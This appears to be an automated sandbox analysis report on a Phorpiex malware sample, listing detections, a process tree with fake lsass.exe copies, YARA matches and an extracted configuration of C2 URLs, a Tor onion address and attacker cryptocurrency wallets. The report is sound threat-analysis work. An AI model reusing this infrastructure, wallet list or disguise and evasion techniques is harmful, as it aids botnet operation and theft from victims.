Edit tour

Windows Analysis Report
6K1uYM85lS.exe

Overview

General Information

Sample name:	6K1uYM85lS.exe renamed because original name is a hash value
Original sample name:	8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c.exe
Analysis ID:	1372442
MD5:	2d5e7babf1b2d92b56fda0b9044f889a
SHA1:	d2f1f6a1e267172fc183a0d1a2affdd26145f59d
SHA256:	8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c
Tags:	exe
Infos:

Detection

Phorpiex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Phorpiex

Changes security center settings (notifications, updates, antivirus, firewall)

Drops PE files with benign system names

Found Tor onion address

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

6K1uYM85lS.exe (PID: 3200 cmdline: C:\Users\user\Desktop\6K1uYM85lS.exe MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)

lsass.exe (PID: 4596 cmdline: C:\180771693628709\lsass.exe MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)

lsass.exe (PID: 5308 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)

lsass.exe (PID: 2884 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)

lsass.exe (PID: 3320 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Phorpiex	Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.	No Attribution	https://bin.re/blog/phorpiex/ https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html https://research.checkpoint.com/2019/phorpiex-breakdown/ https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/	https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://api.wipmania.com/", "http://7fv5nq57k4qvbrpt.onion/", "http://185.215.113.93/", "http://feedmefile.top/", "http://gotsomefile.top/", "http://gimmefile.top/"], "Wallet": ["11650607608992768899L", "15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N", "1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv", "3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ", "bitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfr", "XkcKjKZqNUkChwJXMj5uDjDns6etXvakir", "D7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb", "0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdE", "LfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTG", "rUQFcff9R1eKAwTtR1wbuQxmcoB236mz44", "TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TB", "t1gTRxsrEXwky32j22jgFRZAafBzmCV2M2V", "tz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FY", "hx5f9a4862a5b87d76d60b8ae85e229f892279d49a", "QWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQ", "RTWARPyPyMgJSUNELV6wkSThjh2ub5CyzE", "ND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAE", "AT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3", "SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wd", "zil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxt", "s1j6xPi597KmKbLDAz1EaetoMFys2F1p8zw"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
6K1uYM85lS.exe	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com

Dropped Files

Source	Rule	Description	Author	Strings
C:\180771693628709\lsass.exe	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: 6K1uYM85lS.exe PID: 3200	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: lsass.exe PID: 4596	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: lsass.exe PID: 5308	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: lsass.exe PID: 2884	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: lsass.exe PID: 3320	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.6K1uYM85lS.exe.9a0000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
6.2.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
8.0.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
0.0.6K1uYM85lS.exe.9a0000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
5.2.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
8.2.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
5.0.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
6.0.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
3.0.lsass.exe.770000.0.unpack	MALWARE_Win_Phorpiex	Detects Phorpiex variants	ditekSHen	0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit 0x157b4:$s5: %ls\%d%d 0x158e0:$s5: %ls\%d%d 0x15bd8:$s5: %ls\%d%d 0x15f2c:$s5: %ls\%d%d 0x150b0:$s6: bitcoincash: 0x150d0:$s6: bitcoincash: 0x15174:$s6: bitcoincash: 0x1541c:$s6: bitcoincash: 0x15f54:$s7: %ls:*:Enabled:%ls 0x15a84:$s8: %s\%s\DriveMgr.exe 0x15713:$s9: api.wipmania.com
Click to see the 4 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 6K1uYM85lS.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.93/c1	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/c2	Avira URL Cloud: Label: malware
Source: https://131.188.40.189:443/tor/status-vote/current/consensus.z	Avira URL Cloud: Label: malware
Source: http://199.58.81.140/tor/status-vote/current/consensus.z	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/	Avira URL Cloud: Label: malware
Source: http://feedmefile.top/	Avira URL Cloud: Label: malware
Source: http://86.59.21.38/tor/status-vote/current/consensus.z	Avira URL Cloud: Label: malware
Source: http://gimmefile.top/	Avira URL Cloud: Label: malware
Source: http://gotsomefile.top/	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/c6	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/c5	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/c4	Avira URL Cloud: Label: malware
Source: http://185.215.113.93/c3	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\180771693628709\lsass.exe

Avira: detection malicious, Label: HEUR/AGEN.1360733

Found malware configuration

Source: 8.2.lsass.exe.770000.0.unpack

Malware Configuration Extractor: Phorpiex {"C2 url": ["http://api.wipmania.com/", "http://7fv5nq57k4qvbrpt.onion/", "http://185.215.113.93/", "http://feedmefile.top/", "http://gotsomefile.top/", "http://gimmefile.top/"], "Wallet": ["11650607608992768899L", "15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N", "1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv", "3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ", "bitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfr", "XkcKjKZqNUkChwJXMj5uDjDns6etXvakir", "D7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb", "0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdE", "LfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTG", "rUQFcff9R1eKAwTtR1wbuQxmcoB236mz44", "TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TB", "t1gTRxsrEXwky32j22jgFRZAafBzmCV2M2V", "tz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FY", "hx5f9a4862a5b87d76d60b8ae85e229f892279d49a", "QWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQ", "RTWARPyPyMgJSUNELV6wkSThjh2ub5CyzE", "ND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAE", "AT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3", "SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wd", "zil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxt", "s1j6xPi597KmKbLDAz1EaetoMFys2F1p8zw"]}

Multi AV Scanner detection for domain / URL

Source: gimmefile.top	Virustotal: Detection: 10%	Perma Link
Source: feedmefile.top	Virustotal: Detection: 8%	Perma Link
Source: gotsomefile.top	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\180771693628709\lsass.exe

ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Source: 6K1uYM85lS.exe	ReversingLabs: Detection: 72%
Source: 6K1uYM85lS.exe	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for dropped file

Source: C:\180771693628709\lsass.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 6K1uYM85lS.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: api.wipmania.com

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B1360 Sleep,FindWindowA,Sleep,DeleteFileW,MoveFileW,MoveFileA,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,DeleteFileW,MoveFileW,DeleteFileW,Sleep,DeleteFileW,Sleep,MoveFileW,InternetOpenA,DeleteFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,DeleteFileW,InternetOpenUrlA,Sleep,MoveFileW,DeleteFileW,Sleep,MoveFileA,Sleep,DeleteFileA,InternetCloseHandle,DeleteFileW,Sleep,InternetCloseHandle,Sleep,ShowWindow,DeleteFileW,SetForegroundWindow,DeleteFileW,CloseWindow,MoveFileA,MoveFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,DeleteFileA,FindWindowA,InternetOpenA,MoveFileW,Sleep,MoveFileW,DeleteFileW,InternetOpenUrlA,MoveFileW,DeleteFileW,Sleep,MoveFileW,MoveFileA,Sleep,DeleteFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,MoveFileW,ShowWindow,DeleteFileW,SetForegroundWindow,Sleep,InternetOpenA,InternetOpenUrlA,DeleteFileW,MoveFileW,Sleep,DeleteFileW,InternetCloseHandle,DeleteFileW,Sleep,MoveFileA,DeleteFileW,MoveFileW,DeleteFileA,Sleep,InternetCloseHandle,FindWindowA,MoveFileW,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,PathFileExistsA,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,FindWindowA,Sleep,DeleteFileW,SetForegroundWindow,Sleep,ShowWindow,Sleep,MoveFileA,DeleteFileA,ShowWindow,Sleep,DeleteFileW,MoveFileW,Sleep,MoveFileW,PathFileExistsW,MoveFileW,Sleep,FindWindowA,DeleteFileA,SetForegroundWindow,MoveFileW,SetFocus,DeleteFileW,DeleteFileW,Sleep,Sleep,MoveFileW,Sleep,DeleteFileW,Sleep,ExitProcess,CreateMutexA,GetLastError,ExitProcess,PathFileExistsW,MoveFileA,Sleep,CopyFileA,MoveFileA,MoveFileA,DeleteFileA,Sleep,FindWindowA,MoveFileW,CopyFileA,MoveFileW,DeleteFileA,MoveFileA,Sleep,CopyFileA,MoveFileW,MoveFileW,FindWindowA,MoveFileA,Sleep,DeleteFileW,MoveFileA,Sleep,MoveFileA,InternetOpenA,DeleteFileA,CopyFileA,DeleteFileA,InternetOpenUrlA,DeleteFileW,Sleep,InternetCloseHandle,Sleep,InternetCloseHandle,PathFileExistsA,MoveFileA,MoveFileA,MoveFileA,FindWindowA,CopyFileA,MoveFileA,CloseWindow,Sleep,MoveFileA,MoveFileW,SetForegroundWindow,Sleep,SetFocus,MoveFileA,FindWindowA,InternetOpenA,Sleep,InternetOpenUrlA,Sleep,MoveFileA,DeleteFileA,MoveFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,SetForegroundWindow,DeleteFileA,ShowWindow,DeleteFileW,Sleep,InternetOpenA,InternetOpenUrlA,MoveFileA,InternetCloseHandle,Sleep,MoveFileA,DeleteFileW,Sleep,InternetCloseHandle,FindWindowA,MoveFileA,DeleteFileW,MoveFileA,Sleep,GetModuleFileNameW,PathFindFileNameW,CryptAcquireContextW,CoInitializeEx,wsprintfW,DeleteFileW,GetTickCount,srand,Sleep,wcscmp,Sleep,FindWindowA,MoveFileW,MoveFileA,CopyFileA,DeleteFileA,MoveFileW,Sleep,DeleteFileW,CopyFileA,PathFileExistsA,MoveFileW,DeleteFileA,MoveFileA,DeleteFileA,FindWindowA,MoveFileA,ShowWindow,MoveFileW,Sleep,MoveFileW,ShowWindow,CopyFileA,CloseWindow,InternetOpenA,InternetOpenUrlA,DeleteFileA,Sleep,DeleteFileA,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,ShowWindow,Sleep,SetForegroundWindow,DeleteFileW,SetFocus,CloseWindow,DeleteFileA,FindWi	0_2_009B1360
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	0_2_009A2C90
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,	0_2_009A2680
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A22B0 CryptGenRandom,	0_2_009A22B0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A28F0 CryptDestroyKey,	0_2_009A28F0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,	0_2_009A2420
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2250 CryptReleaseContext,CryptReleaseContext,	0_2_009A2250
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2A60 CryptDestroyHash,	0_2_009A2A60
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	0_2_009AFE60
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009AFD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	0_2_009AFD80
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A25A0 CryptDestroyKey,	0_2_009A25A0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A25D0 memmove,CryptEncrypt,	0_2_009A25D0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A23C0 CryptEncrypt,	0_2_009A23C0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A29F0 CryptHashData,CryptDuplicateHash,CryptGetHashParam,CryptDestroyHash,	0_2_009A29F0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2120 memmove,CryptAcquireContextA,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,	0_2_009A2120
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2970 CryptCreateHash,CryptHashData,CryptDestroyHash,	0_2_009A2970
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A2B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	0_2_009A2B60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00781360 Sleep,FindWindowA,Sleep,DeleteFileW,MoveFileW,MoveFileA,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,DeleteFileW,MoveFileW,DeleteFileW,Sleep,DeleteFileW,Sleep,MoveFileW,InternetOpenA,DeleteFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,DeleteFileW,InternetOpenUrlA,Sleep,MoveFileW,DeleteFileW,Sleep,MoveFileA,Sleep,DeleteFileA,InternetCloseHandle,DeleteFileW,Sleep,InternetCloseHandle,Sleep,ShowWindow,DeleteFileW,SetForegroundWindow,DeleteFileW,CloseWindow,MoveFileA,MoveFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,DeleteFileA,FindWindowA,InternetOpenA,MoveFileW,Sleep,MoveFileW,DeleteFileW,InternetOpenUrlA,MoveFileW,DeleteFileW,Sleep,MoveFileW,MoveFileA,Sleep,DeleteFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,MoveFileW,ShowWindow,DeleteFileW,SetForegroundWindow,Sleep,InternetOpenA,InternetOpenUrlA,DeleteFileW,MoveFileW,Sleep,DeleteFileW,InternetCloseHandle,DeleteFileW,Sleep,MoveFileA,DeleteFileW,MoveFileW,DeleteFileA,Sleep,InternetCloseHandle,FindWindowA,MoveFileW,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,PathFileExistsA,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,FindWindowA,Sleep,DeleteFileW,SetForegroundWindow,Sleep,ShowWindow,Sleep,MoveFileA,DeleteFileA,ShowWindow,Sleep,DeleteFileW,MoveFileW,Sleep,MoveFileW,PathFileExistsW,MoveFileW,Sleep,FindWindowA,DeleteFileA,SetForegroundWindow,MoveFileW,SetFocus,DeleteFileW,DeleteFileW,Sleep,Sleep,MoveFileW,Sleep,DeleteFileW,Sleep,ExitProcess,CreateMutexA,GetLastError,ExitProcess,PathFileExistsW,MoveFileA,Sleep,CopyFileA,MoveFileA,MoveFileA,DeleteFileA,Sleep,FindWindowA,MoveFileW,CopyFileA,MoveFileW,DeleteFileA,MoveFileA,Sleep,CopyFileA,MoveFileW,MoveFileW,FindWindowA,MoveFileA,Sleep,DeleteFileW,MoveFileA,Sleep,MoveFileA,InternetOpenA,DeleteFileA,CopyFileA,DeleteFileA,InternetOpenUrlA,DeleteFileW,Sleep,InternetCloseHandle,Sleep,InternetCloseHandle,PathFileExistsA,MoveFileA,MoveFileA,MoveFileA,FindWindowA,CopyFileA,MoveFileA,CloseWindow,Sleep,MoveFileA,MoveFileW,SetForegroundWindow,Sleep,SetFocus,MoveFileA,FindWindowA,InternetOpenA,Sleep,InternetOpenUrlA,Sleep,MoveFileA,DeleteFileA,MoveFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,SetForegroundWindow,DeleteFileA,ShowWindow,DeleteFileW,Sleep,InternetOpenA,InternetOpenUrlA,MoveFileA,InternetCloseHandle,Sleep,MoveFileA,DeleteFileW,Sleep,InternetCloseHandle,FindWindowA,MoveFileA,DeleteFileW,MoveFileA,Sleep,GetModuleFileNameW,PathFindFileNameW,CryptAcquireContextW,CoInitializeEx,wsprintfW,DeleteFileW,GetTickCount,srand,Sleep,wcscmp,Sleep,FindWindowA,MoveFileW,MoveFileA,CopyFileA,DeleteFileA,MoveFileW,Sleep,DeleteFileW,CopyFileA,PathFileExistsA,MoveFileW,DeleteFileA,MoveFileA,DeleteFileA,FindWindowA,MoveFileA,ShowWindow,MoveFileW,Sleep,MoveFileW,ShowWindow,CopyFileA,CloseWindow,InternetOpenA,InternetOpenUrlA,DeleteFileA,Sleep,DeleteFileA,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,ShowWindow,Sleep,SetForegroundWindow,DeleteFileW,SetFocus,CloseWindow,DeleteFileA,FindWi	5_2_00781360
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772A60 CryptDestroyHash,	5_2_00772A60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077FE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	5_2_0077FE60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772250 CryptReleaseContext,CryptReleaseContext,	5_2_00772250
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,	5_2_00772420
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007728F0 CryptDestroyKey,	5_2_007728F0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007722B0 CryptGenRandom,	5_2_007722B0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	5_2_00772C90
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,	5_2_00772680
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772970 CryptCreateHash,CryptHashData,CryptDestroyHash,	5_2_00772970
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,	5_2_00772B60
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00772120 memmove,CryptAcquireContextA,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,	5_2_00772120
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007729F0 CryptHashData,CryptDuplicateHash,CryptGetHashParam,CryptDestroyHash,	5_2_007729F0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007725D0 memmove,CryptEncrypt,	5_2_007725D0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007723C0 CryptEncrypt,	5_2_007723C0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007725A0 CryptDestroyKey,	5_2_007725A0
Source: C:\180771693628709\lsass.exe	Code function: 5_2_0077FD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	5_2_0077FD80

Phishing

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
